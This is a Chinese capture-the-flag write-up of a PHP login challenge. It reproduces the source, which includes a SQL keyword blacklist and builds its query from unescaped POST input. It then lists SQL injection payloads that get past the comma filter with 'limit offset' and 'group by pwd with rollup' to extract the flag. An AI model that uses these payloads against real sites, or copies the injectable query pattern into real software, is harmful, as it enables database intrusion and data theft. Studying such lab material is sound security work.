F12查看源码,发现注释里有source.txt,猜测是源码文件,打开发现确实是源码。
<?php
error_reporting(0);
if (!isset($_POST['uname']) || !isset($_POST['pwd'])) {
echo '<form action="" method="post">'."<br/>";
echo '<input name="uname" type="text"/>'."<br/>";
echo '<input name="pwd" type="text"/>'."<br/>";
echo '<input type="submit" />'."<br/>";
echo '</form>'."<br/>";
echo '<!--source: source.txt-->'."<br/>";
die;
}
function AttackFilter($StrKey,$StrValue,$ArrReq){
if (is_array($StrValue)){
$StrValue=implode($StrValue);
}
if (preg_match("/".$ArrReq."/is",$StrValue)==1){
print "姘村彲杞借垷锛屼害鍙禌鑹囷紒";
exit();
}
}
$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)";
foreach($_POST as $key=>$value){
AttackFilter($key,$value,$filter);
}
$con = mysql_connect("XXXXXX","XXXXXX","XXXXXX");
if (!$con){
die('Could not connect: ' . mysql_error());
}
$db="XXXXXX";
mysql_select_db($db, $con);
$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";
$query = mysql_query($sql);
if (mysql_num_rows($query) == 1) {
$key = mysql_fetch_array($query);
if($key['pwd'] == $_POST['pwd']) {
print "CTF{XXXXXX}";
}else{
print "浜﹀彲璧涜墖锛�";
}
}else{
print "涓€棰楄禌鑹囷紒";
}
mysql_close($con);
?>
分析源码,首先用filter这个变量过滤了这些关键字and|select|from|where|union|join|sleep|benchmark|,|\(|\),相当于黑名单,然后发现sql变量,发现是之间将post的值传入,可以构造查询语句,接下来到数据库中查找uname等于我们输入的用户名的数据,如果查出来只有一条的话,则继续往下判断;否则,就输出“涓€棰楄禌鑹囷紒”。
查出来只有一条之后,再判断pwd列的数据是否等于我们输入的密码,相同则得到flag,否则输出“浜﹀彲璧涜墖锛�”。
接下来就是构造payload,利用limit 1(数量) offset 0(偏移量),这里由于过滤了逗号,所以不能使用limit 0,1.
1' or 1 limit 1 offset 0# 输出浜﹀彲璧涜墖锛� 说明第一行有数据
1' or 1 limit 1 offset 1# 输出浜﹀彲璧涜墖锛�,说明第两行有数据
1' or 1 limit 1 offset 2# 输出涓€棰楄禌鑹囷紒,说明这一行没有数据
然后使用group by pwd with rollup,意思似乎是多一行用于统计,用MySQL自己测试了一下
我只插入了两行数据,第三行是由于这个语句产生的,所以我们就利用limit offset来读取第三行的数据,最后的payload如下
' or 1 group by pwd with rollup limit 1 offset 2 #
得到flag
CTF{with_rollup_interesting}